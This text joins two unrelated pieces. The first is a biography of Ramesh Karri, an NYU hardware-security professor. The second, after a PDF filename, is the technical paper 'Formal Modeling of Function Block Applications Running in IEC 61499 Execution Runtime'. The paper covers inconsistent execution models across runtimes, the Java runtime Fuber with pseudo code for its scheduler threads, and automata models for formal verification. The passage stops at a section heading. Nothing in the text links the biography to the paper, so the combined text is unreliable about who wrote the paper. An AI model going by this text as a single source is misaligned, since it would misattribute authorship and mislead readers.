Ramesh Karri received the Ph.D. degree in computer science and engineering from the University of California at San Diego, La Jolla, CA, USA, in 1993. He is a Professor of Electrical and Computer Engineering at the Tandon School of Engineering, New York University, Brooklyn, NY, USA. His research and education activities span hardware cybersecurity: trustworthy ICs, processors, and cyberphysical systems; security-aware computer-aided design, test, verification, validation, and reliability; nano meets security; metrics; benchmarks; and hardware cybersecurity competitions. He has over 200 journal and conference publications, including tutorials on trustworthy hardware in IEEE Computer (two) and Proceedings of the IEEE (five). Dr. Karri was the recipient of the Humboldt Fellowship and the National Science Foundation CAREER Award. He is the area director for cyber security of the NY State Center for Advanced Telecommunications Technologies at NYU-Poly; co-founded (2015-present) the Center for Cyber Security (CCS) (http://crissp.poly.edu/), co-founded the Trust-Hub (http://trust-hub.org/), and founded and organizes the Embedded Security Challenge, the annual red team/blue team event at NYU (http://www.poly.edu/csaw2014/csaw-embedded). His group's work on hardware cybersecurity was nominated for best paper awards (ICCD 2015 and DFTS 2015) and received awards at conferences (ITC 2014, CCS 2013, DFTS 2013 and VLSI Design 2012) and at competitions (ACM Student Research Competition at DAC 2012, ICCAD 2013, DAC 2014, ACM Grand Finals 2013, Kaspersky Challenge and Embedded Security Challenge). He co-founded the IEEE/ACM Symposium on Nanoscale Architectures (NANOARCH). He served as program/general chair of conferences including the IEEE International Conference on Computer Design (ICCD), the IEEE Symposium on Hardware Oriented Security and Trust (HOST), the IEEE Symposium on Defect and Fault Tolerant Nano VLSI Systems (DFTS), NANOARCH, RFIDSEC 2015, and WISEC 2015. He serves on several program committees (DAC, ICCAD, HOST, ITC, VTS, ETS, ICCD, DTIS, WIFS).
He is the Associate Editor of the IEEE Transactions on Information Forensics and Security (2010-2014), IEEE Transactions on Computer-Aided Design (2014-present), ACM Journal of Emerging Computing Technologies (2007-present), ACM Transactions on Design Automation of Electronic Systems (2014-present), IEEE Access (2015-present), IEEE Transactions on Emerging Technologies in Computing (2015-present), IEEE Design & Test (2015-present), and IEEE Embedded Systems Letters (2016-present). He is an IEEE Computer Society Distinguished Visitor (2013-2015). He is on the Executive Committee of the IEEE/ACM Design Automation Conference, leading the cybersecurity initiative (2014-present). He has delivered invited keynotes and tutorials on hardware security and trust (ESRF, DAC, DATE, VTS, ITC, ICCD, NATW, LATW).
Formal_Modeling_of_Function_Block_Applications_Running_in_IEC_61499_Execution_Runtime.pdf
The execution model in a new standard for distributed control systems, IEC 61499, is analyzed. It is shown how the same standard compliant application running in two different standard compliant runtime environments may result in completely different behaviors. Thus, to achieve true portability of applications between multiple standard compliant runtime environments, a more detailed execution model is necessary. In this paper a new runtime environment, Fuber, is presented along with a formal execution model. In this case the execution model is given as a set of interacting state machines, which makes it straightforward to analyze the behavior of the application and the runtime together using existing tools for formal verification.

I. INTRODUCTION

Manufacturing systems and process control systems are typically controlled by a distributed control system. Developing distributed manufacturing and process control systems is time-consuming and error-prone because the environment is typically heterogeneous, consisting of hardware from multiple vendors, which often implies that different languages and development tools are used to develop the software control functions. Industrial control systems generally have high requirements on reliability and timing constraints of the control functions. Thus the control software is typically written in special purpose languages defined in the standard IEC 61131 [1], [2] and executed on special purpose hardware called Programmable Logic Controllers (PLCs). However, IEC 61131 has only very rudimentary support for developing distributed control applications.

For general purpose computers a number of standards for developing distributed systems have emerged, most notably CORBA [3], DCOM [4], and SOAP [5]. CORBA and SOAP are vendor independent techniques, while DCOM relies on services offered by Microsoft Windows. Technically these standards could be used for distributed control systems as well, if the hardware supported them. However, due to their size and the complexity of implementing them, they are unsuitable for use by PLC programmers, who typically also have limited hardware resources.

For industrial control systems two existing standards are in use. Manufacturing Message Specification (MMS) [6] has been a standard since 1988 and defines how the value of one variable in a PLC may be read and written from another PLC. OPC [7] relies on DCOM for transportation of data between computers and is thus relying on Microsoft technologies, which might be a problem in heterogeneous environments.

In 2005 the International Electrotechnical Commission (IEC) approved a standard for distributed function blocks (FBs), IEC 61499 [8]-[10], that extends the existing standard IEC 61131 to facilitate the development of distributed control systems. A number of development environments for IEC 61499 have emerged, including FBDK [11], CORFU [12], Torero [13] and ISaGRAF [14]. There are also IEC 61499 runtime environments which focus on real-time execution of FB applications, RTSJ-AXE [15] and RTAI-AXE [16].

Current research on the IEC 61499 standard has focused on architectures for building control applications [17]-[20], verification of applications [21]-[23] and performance analysis of runtime environments [24]. The IEC 61499 standard has standardized how a single function block should be executed, but not an execution model for function block networks. This paper analyzes the consequences of not having a standardized execution model for function block networks.
We show how the same application, when executing in two different standard compliant runtime environments, may have different logical behavior and potentially harm humans or equipment that are interacting with the control system. Thus, moving an application from one runtime environment to another might require a rewrite of the entire application, or a part of it, for correct behavior of the control system. A well-defined execution model is therefore necessary both for being able to build reusable software components and for being able to verify the behavior of the control application. The choice of execution model also has consequences on the performance of the runtime environment. To the authors' best knowledge, the importance of the function block network execution model for the behavior of an IEC 61499 application has not been published before.

In this paper a new runtime environment is also introduced, Fuber [25]. A formal execution model is defined for Fuber, making the behavior deterministic, and thus predictable, and possible to analyze using existing tools for formal verification and synthesis. A translation of an IEC 61499 application running inside Fuber to a set of interacting state automata is presented. The behavior may then be analyzed in a standard tool for supervisor verification and synthesis, e.g. Supremica [26]. The automata models may also be used for synthesis of a scheduling function so that a given behavior specification is satisfied.

The paper is organized as follows. In Section II the terminology of the IEC 61499 standard is introduced. This is followed by an analysis of different execution models in Section III that shows the importance of a well-defined execution environment. In Section IV, a new execution runtime is presented. In Sections V and VI the models for two different runtime environments, of which one is Fuber, are presented. The paper is ended with the conclusion.

II. IEC 61499 BASICS

In this section the basic terminology from the IEC 61499 standard is introduced. The architecture is based on functional software units called function blocks, where the basic function block type is the basic entity.

In Fig. 1(a) the anatomy of a basic function block type is presented. The basic function block executes algorithms based on the arriving events and generates new events that are passed on when the algorithms finish execution. The algorithms use data associated with incoming events to update internal variables and produce output data. When an algorithm has terminated, an output event is generated, triggering another function block for execution.

The Execution Control Chart (ECC), of which an example can be seen in Fig. 1(b), determines which algorithm to execute based on the current input event and the values of input, output and internal variables. When a state is entered, each action associated with the state is executed once, and the ECC stays in the state until a condition for entering another state is fulfilled. The conditions upon which transitions occur are boolean expressions involving input events and input, output and local variables. A special case of a transition condition is one labeled with 1, which means that it is always true and is taken as soon as all actions of a state are executed.
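To make the ECC behavior just described more concrete, the following minimal Java sketch hand-codes the ECC of Fig. 1(b): on input event EI the chart moves from STATE0 to STATE1, runs ALGORITHM once, issues EO, and immediately returns to STATE0 because of the always-true 1 condition. The class and method names are illustrative assumptions only; they are not taken from the IEC 61499 standard or from any runtime discussed in this paper.

// Illustrative sketch only: a hand-coded version of the ECC in Fig. 1(b).
// Class and method names are hypothetical, not defined by IEC 61499.
public class SimpleBasicFunctionBlock {

    private enum EccState { STATE0, STATE1 }

    private EccState state = EccState.STATE0;

    /** Called when input event EI arrives. */
    public void onEI() {
        if (state == EccState.STATE0) {
            // Transition STATE0 -> STATE1 fires on EI.
            state = EccState.STATE1;
            algorithm();   // action of STATE1: run ALGORITHM once
            emitEO();      // action of STATE1: issue output event EO
            // The "1" (always true) condition returns the ECC to STATE0
            // as soon as all actions of STATE1 have been executed.
            state = EccState.STATE0;
        }
    }

    private void algorithm() {
        // The algorithm body would update internal and output variables here.
    }

    private void emitEO() {
        // In a runtime, this would propagate EO over an event connection.
        System.out.println("EO");
    }

    public static void main(String[] args) {
        new SimpleBasicFunctionBlock().onEI(); // prints "EO"
    }
}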
Fig. 1. (a) Anatomy of a basic function block. The left side of the block contains the event and data inputs, while the right side contains the event and data outputs. The basic function block contains an execution control chart (ECC) and a set of algorithms. The ECC determines which algorithm to execute. (b) An example of an execution control chart (ECC). This ECC states that if it is in STATE0 and input event EI is received, the ECC transfers to state STATE1 and schedules the algorithm named ALGORITHM for execution. After ALGORITHM has terminated the output event EO is generated, and the ECC returns immediately to state STATE0 since the transition condition is 1 (true).

Basic function blocks are connected together by event and data connections into function block applications. For an example of a complete application, see Fig. 3. The applications can be executed using a runtime environment that implements the execution model defined by the standard. It is, however, important to note that the standard does not define in which order the function blocks should be executed. In the next section we show with a simple example how this may have large consequences for the logical behavior of the control system.

III. ANALYSIS OF EXECUTION MODEL

In this section the importance of a well-defined execution environment is shown. First, a simple example is introduced and different block scheduling orders are discussed. Second, how to handle events that occur close to each other in time is discussed. Finally, a conclusion about the execution model is presented.

A. Block Scheduling Order

To show the importance of different block execution orders a simple example is used, see Fig. 2. A requirement for the control system is that the OpenClamp algorithm is executed before the PushOut algorithm. A straightforward implementation of the control for this example using IEC 61499 is shown in Fig. 3.

Fig. 2. The example contains a fixture for holding a workpiece and an automatic carriage. The workpiece is processed in the fixture. After processing, the carriage is brought to the fixture as the clamp is opened. When the carriage is in place the workpiece is pushed out and falls into the carriage. The carriage transports the workpiece to a buffer.

When the control application is run, the only block ready to execute is restart. Execution of restart generates the output event COLD, which is an input event to split. As a consequence, output events EO1 and EO2 are generated in split. At this point both carriage and fixture receive input events. Here the standard does not define whether carriage should be executed before fixture or the other way around. The standard also allows carriage and fixture to execute concurrently. Assume that carriage executes, resulting in another input event to fixture. Now the only block ready to execute is fixture. According to the standard it is possible for fixture to execute EI1 before EI2 or vice versa.
Note that if EI1 is executed first, the OpenClamp algorithm is executed before the PushOut algorithm, but if EI2 is executed before EI1, then PushOut is executed before OpenClamp, possibly resulting in destroyed equipment. Thus, the same standard compliant application executing within two standard compliant runtime environments may result in very different behaviors. It is possible to argue that, given the specified requirements, the application should have been implemented in a different way. However, that is beside the point. Eventually, this subtle problem will arise when the application is moved from one runtime environment to another.

Fig. 3. At the top, the function blocks used for control of the application presented in Fig. 2 are shown. At the bottom of the figure, the execution control charts of the function blocks are shown.

B. Contiguous Events

Events that occur close to each other in time are common in reactive and distributed control systems; hence it is desirable that a standard is explicit on how these contiguous events are handled. This section presents what the standard states about contiguous events and how that is implemented in some available runtime environments. Two different cases of contiguous events are discussed: multiple events on different event inputs and multiple events on the same event input. The two cases deal with events arriving simultaneously, or almost simultaneously, at the event inputs of the same function block, for example, one event arriving at the function block when the block's ECC is busy executing an algorithm triggered by the previous event.

In the standard [8] the behavior of the ECC is defined in section 5.2.2.2. It is stated that all operations from the invocation of the ECC (which is activated by the arrival of an event at an event input) until there are no more ECC transitions that can be taken should be implemented as a critical region. Our interpretation of this statement is that events arriving while the ECC is busy should not be discarded; instead they should be saved in a queue for later handling. It might be possible to instead interpret this so that arriving events are discarded when the ECC is busy. The latter interpretation could have advantages in real-time systems but can lead to undesired behavior in some applications, for instance the example presented later in this section. Furthermore, under our interpretation of the standard, the event queue does not necessarily have to be a first-in-first-out queue. How the queue is implemented may also have important consequences for the behavior of an application, possibly resulting in undesired behavior.
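As a rough illustration of the "queue rather than discard" interpretation adopted above, the Java sketch below stores every arriving event together with a snapshot of its data inputs, sampled at arrival time, so that contiguous events are not lost while the ECC is busy. The class names and the single integer data input are hypothetical assumptions for illustration; this is not code taken from any of the runtime environments discussed here.

import java.util.ArrayDeque;
import java.util.Queue;

// Minimal sketch of an event input queue that never discards contiguous
// events: each arriving event is stored with a copy of its data inputs,
// sampled at arrival time. Names are illustrative only.
public class QueuedEventInput {

    /** An input event plus the data value sampled when it arrived. */
    record QueuedEvent(String eventInput, int sampledDataInput) { }

    private final Queue<QueuedEvent> eventInputQueue = new ArrayDeque<>();

    /** Called when an event arrives, even if the ECC is currently busy. */
    public void receiveEvent(String eventInput, int currentDataInput) {
        eventInputQueue.add(new QueuedEvent(eventInput, currentDataInput));
    }

    /** Called when the ECC is ready to handle the next event, in FIFO order. */
    public QueuedEvent nextEvent() {
        return eventInputQueue.poll(); // null when there is nothing left
    }

    public static void main(String[] args) {
        QueuedEventInput in = new QueuedEventInput();
        // Two contiguous events on the same event input: both are kept.
        in.receiveEvent("EI", 1);
        in.receiveEvent("EI", 2);
        System.out.println(in.nextEvent()); // QueuedEvent[eventInput=EI, sampledDataInput=1]
        System.out.println(in.nextEvent()); // QueuedEvent[eventInput=EI, sampledDataInput=2]
    }
}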
To investigate further how contiguous events are handled in different runtime environments, an example function block application was used. The application tests the two cases of contiguous events in two available runtime environments: the Fuber runtime environment, presented later in this paper, and ISaGRAF 5.0 [14], the first commercially available IEC 61499 runtime and development environment. Fuber is designed from the ground up to be an IEC 61499 runtime environment, while ISaGRAF appears to be an implementation of IEC 61499 on top of an existing scan-cycle based IEC 61131 runtime.

Fig. 4. (a) Example application producing simultaneous events. (b) ECC for the standard event function block E_MERGE.

The example application is shown in Fig. 4a. Two E_CYCLE blocks produce events which go to the merge block at the same time. Events generated by the merge block then go into a counter block which simply counts the number of arriving events. The ECC for the standard E_MERGE function block type is shown in Fig. 4b. Running the application for x seconds, the counter should count 2x events. When the application is executed in Fuber, the counter counts 2x events, while in the scan-cycle based ISaGRAF runtime the counter only counts x events. This means that every other event has been lost.

The problem with the scan-cycle based runtime is that multiple events on different event inputs are not detected by the merge block, and when the ECC is executed for one event the other event is discarded. Hence ISaGRAF has not interpreted, or at least not implemented, the standard the same way as we have, possibly due to the scan-cycle based strategy. This particular problem could, however, be solved by making a new merge block with a different ECC which distinguishes between the case when one event arrives on either event input and the case when an event arrives on both event inputs simultaneously. In the second case the new merge block sends out two output events. Using this solution for the merge block, the problem then moves to the counter function block, which now does not detect the two events arriving almost simultaneously at the same event input.

The solution to the contiguous events problem therefore requires adjustments to the underlying runtime implementation so that simultaneously arriving events on an event input are correctly reported to the ECC. Neither of the cases of contiguous events is a problem when function block applications are executed in the Fuber runtime environment, since all incoming events are reported to the ECC.

C. Conclusion about the Execution Model

Due to the possible incompatibility between runtime environments presented above, a developer writing IEC 61499 control applications has to be extremely careful if portability between runtime environments is important. To achieve true "write once, execute on every IEC 61499 runtime environment" portability, it is necessary to standardize on a single, or possibly a small number of, application execution models (as opposed to function block execution models). Also, in those cases where portability is not important, it is still important to have a well-defined execution model to be able to analyze the behavior of the application using available tools for formal verification.

Driven by an interest in formal verification of IEC 61499 applications, a new IEC 61499 runtime environment with a well-defined, and thus analyzable, execution model has been implemented. In the next section this new runtime environment, called Fuber, is presented.
IV. FUBER

Fuber (FUnction Block Execution Runtime) is developed in Java under an open source license and the complete source code is available at [25]. Fuber is able to open many IEC 61499 compliant applications and execute them. Unlike most other runtime environments, Fuber does not compile the algorithms before execution; instead the algorithms are interpreted using BeanShell [27], which makes it possible to update the behavior of an application during execution, a feature that might be useful for debugging and high-availability applications.

A. Current Limitations

Current limitations of Fuber are that the algorithms must be implemented in Java and that composite data types for variables are not handled. At this point there is also no built-in support for distributing applications to multiple resources. There is currently no graphical user interface; instead Fuber is controlled by a command line interface. Also, there is no support for ensuring timeliness of the executed applications, and no real-time aspects of the runtime environment were considered. Fuber is prepared to be able to update function block types and instances, as well as connections between function block instances, while the application is executing, making it easy to reconfigure the control software. It is, however, not yet possible to trigger the updates using an external Fuber interface. We are working on removing these limitations.

B. Implementation

In order to be able to develop a formal execution model, some implementation details of Fuber are introduced. The terminology in this section follows to a large extent the terminology defined in the standard [8].

A UML class diagram [28] of the design of the function block scheduler in Fuber is shown in Fig. 5. The scheduler holds references to function block instances scheduled for execution, algorithm jobs scheduled for execution, and the event and algorithm executing threads.

Fig. 5. UML class diagram of the scheduler implementation in Fuber.

The BasicFBInstance class in Fig. 5 holds all information specific to a basic function block instance, that is, among other things: a reference to the ECC, algorithm definitions, the instance's variables (input data, output data and local) and the event input queue. The event input queue is a FIFO queue and it is used for holding incoming input events. Incoming events are queued together with their associated data, which is sampled at the time when the event is received. This design is used in order to avoid the problem of event loss in cases when several events arrive in close succession (as discussed in Section III-B) and when an event arrives while the receiving instance is busy handling an earlier event.

For the same reason the design with two types of threads is used. The event executing thread takes care of incoming events, some of which should not be discarded, while a function block instance's algorithm job is executing in the algorithm executing thread. If only a single thread were used for both purposes, incoming events during the execution of a function block's algorithms would not be noticed by the execution thread.
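The following Java sketch approximates the scheduler structure of Fig. 5 and the two-thread design just described: one FIFO queue of function block instances serviced by an event executing thread, and one FIFO queue of algorithm jobs serviced by an algorithm executing thread. It is a simplified illustration under the assumption that a Runnable can stand in for "handle the next event of this instance" and "execute this algorithm job"; it is not Fuber's actual source code.

import java.util.concurrent.BlockingQueue;
import java.util.concurrent.LinkedBlockingQueue;

// Simplified sketch of the scheduler structure in Fig. 5: two FIFO queues,
// one serviced by an event executing thread and one by an algorithm
// executing thread. Illustration only, not the actual Fuber implementation.
public class TwoThreadScheduler {

    private final BlockingQueue<Runnable> scheduledFBInstances = new LinkedBlockingQueue<>();
    private final BlockingQueue<Runnable> scheduledJobs = new LinkedBlockingQueue<>();

    /** Called when a function block instance has input events to handle. */
    public void scheduleFBInstance(Runnable handleEvent) {
        scheduledFBInstances.add(handleEvent);
    }

    /** Called when an ECC action requests execution of an algorithm. */
    public void scheduleJob(Runnable algorithmJob) {
        scheduledJobs.add(algorithmJob);
    }

    public void start() {
        // Event executing thread: services queued instances in FIFO order.
        Thread eventThread = new Thread(() -> {
            while (true) {
                try {
                    scheduledFBInstances.take().run(); // invoke handleEvent()
                } catch (InterruptedException e) {
                    return;
                }
            }
        }, "event-executing-thread");

        // Algorithm executing thread: services queued algorithm jobs.
        Thread algorithmThread = new Thread(() -> {
            while (true) {
                try {
                    scheduledJobs.take().run(); // run the algorithm, then sendEvent()
                } catch (InterruptedException e) {
                    return;
                }
            }
        }, "algorithm-executing-thread");

        eventThread.setDaemon(true);
        algorithmThread.setDaemon(true);
        eventThread.start();
        algorithmThread.start();
    }
}

A real implementation additionally has to remember whether an instance is already queued; in the pseudo code that follows, this is the purpose of the queuedInScheduler flag.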
In Fuber it is possible to create a number of algorithm executing threads and event executing threads, but in order to keep the complexity down, this paper discusses only the case when one thread of each kind is used.

1) Event Executing Thread: The event executing thread services the scheduled function block instances queue (see Fig. 5), which is implemented as a FIFO queue. The queue holds function block instances that have announced to the scheduler that they have input events to handle. When the thread has finished servicing the previous function block instance, it takes a new one by removing it from the queue and invokes its handleEvent() method. In this method the ECC of the instance is run for every event in the instance's event input queue until an ECC transition fires. Then the first action, if any, of the new state is analyzed and, if it has an algorithm defined to run, an algorithm execution job is queued in the scheduler's scheduledJobs queue. When the algorithm execution job has been queued, the thread takes a new function block instance from the scheduledFBInstances queue. A formal definition of the event executing thread in pseudo code follows:

Event Executing Thread:
  loop
    next ← scheduler.getNextScheduledFBInstance()
    next.handleEvent()
  end loop

The following procedures are methods of the BasicFBInstance class. Attributes without a type specified in front of them are class attributes (not static).

procedure handleEvent()
  queuedInScheduler ← false
  handlingEvent ← true
  ECState newECState ← null
  while newECState = null AND eventInputQueue.size() > 0 do
    currentEvent ← getNextEvent()
    set all input event variables to false
    set current input event variable to true
    copy data inputs from event buffer to variables
    newECState ← updateECC()
  end while
  if newECState ≠ null then
    handleNewState(newECState)
  else
    handlingEvent ← false
  end if
end procedure

procedure handleNewState(state)
  currentECState ← state
  actionsIterator ← currentECState.actionsIterator()
  handleState()
end procedure

procedure handleState()
  if NOT actionsIterator.hasNext() then
    set current input event variable to false
    (repeat handling of the state if the state changes)
    ECState newECState ← updateECC()
    if newECState ≠ null then
      handleNewState(newECState)
    else
      if NOT queuedInScheduler AND eventInputQueue.size() > 0 then
        scheduler.scheduleFBInstance(this)
        queuedInScheduler ← true
      end if
      handlingEvent ← false
    end if
  else
    handleAction(actionsIterator.next())
  end if
end procedure

procedure handleAction(action)
  currentECAction ← action
  if currentECAction has an algorithm then
    submit algorithm execution job
  else if currentECAction has an event output then
    sendEvent()
  end if
end procedure

procedure sendEvent()
  if currentECAction has an event output then
    call receiveEvent() of the FB instance on the output connection
  end if
  handleState()
end procedure

procedure receiveEvent(eventInput)
  create newEvent
  get data inputs for eventInput and store them in newEvent
  eventInputQueue.add(newEvent)
  if NOT (queuedInScheduler OR handlingEvent) then
    scheduler.scheduleFBInstance(this)
    queuedInScheduler ← true
  end if
end procedure

2) Algorithm Executing Thread: The algorithm execution queue, which is also a FIFO queue, is serviced by the algorithm executing thread. When the thread has finished with the previous job, it takes a new one by removing it from the queue and executing its algorithm with the job's variables.
When the algorithm has finished, the thread invokes the sendEvent() method of the job's basic function block instance object. The method checks if there is an output event defined in the action for which the job was queued and, if there is, sends an event to the function block instance connected on that event output. The receiving instance then queues the incoming event in its event input queue. The sendEvent() method then takes the next defined action in the ECC state and either queues another algorithm execution job or sends an output event, depending on whether an algorithm is defined in the action or not. If there is no further action, the method updates the ECC and, if a transition fires, it handles the new ECC state in the same way that the event executing thread does, by examining the actions and queuing any defined algorithms or sending output events. When this is done the thread takes a new job from the algorithm execution queue. A formal definition of the algorithm executing thread in pseudo code follows:

Algorithm Executing Thread:
  loop
    Job currentJob ← scheduler.getNextScheduledJob()
    execute current job
    update local and output variables
    call sendEvent() of the current job's instance
  end loop

V. FORMAL MODELING

This section presents an automata model of a function block application running in the Fuber runtime environment, based on the execution definition presented in the previous section. To obtain the automata model of a function block application running in the Fuber runtime, the following steps need to be done:

- Generate models of the instance queue and the algorithm job queue.
- Generate the event execution model.
- For each basic function block, generate models of event receiving, event handling, the event input queue and ECC handling.
- Generate models of service function blocks.
- Generate models of composite function blocks.
- Generate models of instance connections in the application.

In this paper the focus is on generating models that can be analyzed in Supremica [26], [29], [30]. The basic model in Supremica is interacting finite automata. An automaton consists of states, transitions and an alphabet of events. A transition is associated with a number of events. If the same event is associated with transitions that belong to two different automata, then both of the automata must be in a state where that event can occur in order for that event to be allowed in the global behavior of the system. This type of model can be used to verify and synthesize supervisors that fulfill given specifications.
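To illustrate the interacting-automata semantics described above, the sketch below composes two small automata that share an event: a shared event may occur in the global behavior only when every automaton that has the event in its alphabet enables it in its current state. The representation is a deliberately simplified assumption for illustration; it is not Supremica's model format, and the state and event names are made up.

import java.util.HashMap;
import java.util.Map;
import java.util.Set;

// Simplified illustration of interacting finite automata with shared events:
// an event is allowed globally only if every automaton whose alphabet
// contains it has an outgoing transition for it in its current state.
// Not Supremica's format; names are purely illustrative.
public class InteractingAutomata {

    static final class Automaton {
        final Set<String> alphabet;
        // state -> (event -> next state)
        final Map<String, Map<String, String>> transitions = new HashMap<>();
        String current;

        Automaton(String initialState, Set<String> alphabet) {
            this.current = initialState;
            this.alphabet = alphabet;
        }

        void addTransition(String from, String event, String to) {
            transitions.computeIfAbsent(from, s -> new HashMap<>()).put(event, to);
        }

        boolean enables(String event) {
            // Events outside the alphabet are not constrained by this automaton.
            return !alphabet.contains(event)
                    || transitions.getOrDefault(current, Map.of()).containsKey(event);
        }

        void step(String event) {
            if (alphabet.contains(event)) {
                current = transitions.get(current).get(event);
            }
        }
    }

    /** Fires an event in the composed system only if all automata enable it. */
    static boolean fire(String event, Automaton... automata) {
        for (Automaton a : automata) {
            if (!a.enables(event)) {
                return false; // blocked by at least one automaton
            }
        }
        for (Automaton a : automata) {
            a.step(event);
        }
        return true;
    }

    public static void main(String[] args) {
        // Automaton A only allows "shared" after its local event "a_local".
        Automaton a = new Automaton("a0", Set.of("a_local", "shared"));
        a.addTransition("a0", "a_local", "a1");
        a.addTransition("a1", "shared", "a0");

        // Automaton B always allows "shared" from its single state.
        Automaton b = new Automaton("b0", Set.of("shared"));
        b.addTransition("b0", "shared", "b0");

        System.out.println(fire("shared", a, b));  // false: A does not enable it yet
        System.out.println(fire("a_local", a, b)); // true: B does not constrain a_local
        System.out.println(fire("shared", a, b));  // true: both automata now enable it
    }
}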
A. Formal Models

The models representing the instance and algorithm queues of the scheduler depend on the number of elements that may be placed on the queue and the maximal length of the queue. To explain the generation, the example from Section III-A is used. In order to keep the generated automata as small as possible, the E_RESTART function block is left out from the discussion below.

1) Scheduled Function Block Instance Queue Model: The scheduled function block instance queue is a first-in-first-out (FIFO) queue. The queue contains all function block instances that have an event ready to execute. A given function block instance may occupy only one place in the queue at any time. This is the result of the design decision to only queue the instance when it has input events to handle. If the instance has more than one input event to handle, it queues itself after each scheduled handling of an event. The function block instance queue model is presented in Fig. 6. The automaton model in the figure can be automatically generated when the application is known.

Fig. 6. Automaton model of the function block instance queue in Fuber for the example application (events: queue_fb_split, queue_fb_carriage, queue_fb_fixture, handle_event_split, handle_event_carriage, handle_event_fixture). Each function block instance can be represented at most once in the queue, which is a first-in-first-out queue. In this specific application any two of the function blocks may be in the queue, but not all three simultaneously.

2) Scheduled Jobs Queue Model: The model of the scheduled jobs queue is also a FIFO queue. The length of this queue is determined by the length of the function block instance queue. A model is shown in Fig. 7.

Fig. 7. Automaton model of the algorithm job queue in Fuber for the example application (events: queue_job_carriage_GetCarriage, queue_job_fixture_OpenClamp, queue_job_fixture_PushOut, finished_job_carriage_GetCarriage, finished_job_fixture_OpenClamp, finished_job_fixture_PushOut). Some transitions are removed for clarity.

3) Event Execution Model: The event execution model specifies that each function block instance must wait for another instance to finish its event handling before it can begin its own event handling. This can be modeled as shown in Fig. 8.

Fig. 8. Automaton model of event execution in Fuber for the example application (events: handle_event_split, handle_event_carriage, handle_event_fixture, handling_event_done_split, handling_event_done_carriage, handling_event_done_fixture).

4) Function Block Instance Specific Models: Each function block will have four corresponding automata: the receiving event automaton, the event handling automaton, the event input queue automaton, and the ECC handling automaton. Each of these automata, except the ECC handling automaton, has the same structure for all function blocks. The only difference is in which events are associated with the transitions. The automata models in this section describe the same behavior as the pseudo code in Section IV, for the case when there is one event executing thread and one algorithm executing thread.

a) Event input queue, receiving event and event handling automata: The model of the event input queue represents the behavior of the queue that holds incoming events for basic function block instances. This queue model cooperates with the event receiving and event handling models to represent handling of incoming events in FIFO order. The queue, receiving event and event handling automata for the fixture function block are shown in Fig. 9, Fig. 10 and Fig. 11.

Fig. 9. Automaton model of the fixture event input queue (events: receive_event_fixture_EI1, receive_event_fixture_EI2, event_fixture_EI1, event_fixture_EI2, get_event_fixture).

Fig. 10. Automaton model of fixture event receiving (events: receive_event_fixture_EI1, receive_event_fixture_EI2, received_event_fixture_EI1, received_event_fixture_EI2, queue_fb_fixture, handle_event_fixture, handling_event_done_fixture).

Fig. 11. Automaton model of fixture event handling (events: get_event_fixture, update_ECC_fixture, no_action_fixture, no_transition_fired_fixture, handle_event_fixture, handling_event_done_fixture).
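Because the receiving event, event handling and event input queue automata share the same shape for every basic function block and differ only in their event alphabets, their generation can be driven by a simple naming template. The sketch below only illustrates how the per-instance event names used in Figs. 6 to 11 could be derived from an instance name and its event inputs; the transition structure of each template is deliberately omitted, and the helper names are hypothetical.

import java.util.ArrayList;
import java.util.List;

// Illustrative sketch: deriving a per-instance event alphabet of the kind
// used by the template automata (cf. the event names in Figs. 6 to 11).
// Only the naming scheme is shown; the template transition structure is not.
public class PerInstanceEventNames {

    static List<String> eventAlphabet(String instance, List<String> eventInputs) {
        List<String> names = new ArrayList<>();
        names.add("queue_fb_" + instance);
        names.add("handle_event_" + instance);
        names.add("handling_event_done_" + instance);
        names.add("get_event_" + instance);
        names.add("update_ECC_" + instance);
        for (String ei : eventInputs) {
            names.add("receive_event_" + instance + "_" + ei);
            names.add("received_event_" + instance + "_" + ei);
            names.add("event_" + instance + "_" + ei);
        }
        return names;
    }

    public static void main(String[] args) {
        // Same template, different instances of the example application.
        System.out.println(eventAlphabet("fixture", List.of("EI1", "EI2")));
        System.out.println(eventAlphabet("carriage", List.of("EI")));
    }
}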
b) ECC handling automaton: The ECC model describes what happens during ECC handling, see Section IV. This model interacts, using shared events, with the event handling model to indicate when there are no more actions left for an ECC state or when an ECC transition has not fired. The ECC structure determines what the model looks like, and it can be automatically generated from the ECC description. One necessary restriction, for the automatic analysis in this paper, is that ECCs only use event inputs in the boolean expressions of ECC state transitions. The ECC handling automaton for the fixture function block is shown in Fig. 12. The other two basic function blocks, split and carriage, are modeled in the same way.

Fig. 12. Automaton model of fixture ECC handling.

Fig. 13. Automaton model of the event connection between split.EO1 and carriage.EI.

5) Service and Composite Function Block Models: Composite function blocks are modeled by connection models connecting their external event inputs and outputs with the internal function blocks. Since the service function block implementation is runtime specific, the models of those blocks have to be hand crafted. The only service interface function block in the example application is the restart block. It is modeled by a single transition on the send output restart cold event from the initial state.

6) Connection Models: The event connections of the application are all modeled by two-state automata, since the standard defines one-to-one event connections. The models simply represent the behavior that the input event of the receiving instance must come after the output event of the sending instance. The connections of the example are modeled accordingly by two-state automata with the corresponding event output and event input on their transitions. The connection between the split instance's EO1 event output and carriage's EI event input is shown in Fig. 13. In the next section the formal models are used to verify if given specifications are fulfilled.
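As a small illustration of these connection models and of the shared-event semantics described for Supremica, the sketch below encodes the split.EO1 to carriage.EI connection as a two-state automaton. The dictionary representation is only an assumption made for the example; it is not Supremica's model format.

    # Two-state connection automaton for split.EO1 -> carriage.EI (illustrative
    # encoding; not the Supremica input format).
    CONNECTION = {
        "alphabet": {"send_event_split_EO1", "receive_event_carriage_EI"},
        "transitions": {(0, "send_event_split_EO1"): 1,
                        (1, "receive_event_carriage_EI"): 0},
        "initial": 0,
    }

    def enabled(automata, states, event):
        # A shared event is allowed in the global behavior only if every automaton
        # that has the event in its alphabet is in a state where it can occur.
        return all(event not in a["alphabet"] or (s, event) in a["transitions"]
                   for a, s in zip(automata, states))

    def step(automata, states, event):
        assert enabled(automata, states, event), f"{event} is blocked"
        return tuple(a["transitions"][(s, event)] if event in a["alphabet"] else s
                     for a, s in zip(automata, states))

    automata, states = [CONNECTION], (CONNECTION["initial"],)
    print(enabled(automata, states, "receive_event_carriage_EI"))   # False: EO1 not sent yet
    states = step(automata, states, "send_event_split_EO1")
    print(enabled(automata, states, "receive_event_carriage_EI"))   # True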
VI. FORMAL ANALYSIS OF TWO EXECUTION MODELS

In Section III-A it was shown informally how two function block network execution models could give rise to different logical behavior of the same function block application. In this section we return to the example and show formally, using Supremica, how one execution model fulfills the specification while the other does not.

A. Alternative Runtime Environment

